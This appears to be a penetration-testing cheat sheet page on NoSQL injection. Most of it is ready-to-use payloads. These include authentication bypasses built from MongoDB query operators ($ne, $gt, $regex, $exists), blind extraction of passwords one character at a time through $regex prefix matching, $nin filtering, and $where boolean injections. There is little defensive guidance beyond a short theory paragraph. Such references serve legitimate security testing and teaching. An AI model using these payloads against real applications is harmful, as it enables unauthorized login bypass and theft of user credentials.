NoSQL Injection

Theory

NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

Practice

Authentication Bypass

Using not equal ($ne) or greater ($gt) we can try to bypass authentication

username[$ne]=toto&password[$ne]=toto          #Not Equal
username[$regex]=.*&password[$regex]=.*        #Regex
username[$exists]=true&password[$exists]=true  #If Exist
username[$ne]=admin&password[$gt]=0            #Greater

Using not equal ($ne) or greater ($gt) we can try to bypass authentication

{"username": {"$ne": null}, "password": {"$ne": null} }             #Not Equal
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }           #Not Equal
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }   #greater

Extract data

We can use regex to find the length of a value

username[$regex]=.{25}&pass[$ne]=1

We can use regex to extract information.

username[$eq]=admin&password[$regex]=^p
username[$eq]=admin&password[$regex]=^pa
username[$eq]=admin&password[$regex]=^pas

username[$ne]=toto&password[$regex]=^p
username[$ne]=toto&password[$regex]=^pa
username[$ne]=toto&password[$regex]=^pas

We can use $nin (not in) if you don't want to match with some values.

#<Matches non of the values of the array> (not test and not admin)
username[$nin][admin]=admin&username[$nin][test]=test&password[$regex]=^p

We can use regex to find the length of a value

{"username": {"$eq": "admin"}, "password": {"$regex": ".{25}" }}

We can use regex to extract information.

{"username": {"$eq": "admin"}, "password": {"$regex": "^p" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^pa" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^pas" }}

We can use $nin (not in) if you don't want to match with some values.

#<Matches non of the values of the array> (not test and not admin)
{"username":{"$nin":["admin", "test"]}, "username":{"$regex": "^user" } ,"password":{"$ne":"1"}}

MangoDB Injection

You may try to make boolean based injection on MongoDB with following payloads

, $where: '1 == 1'
$where: '1 == 1'
' || 1==1//
' || 1==1%00

Resources

NoSQL injectionHackTricks

PayloadsAllTheThings/NoSQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Last updated 3 months ago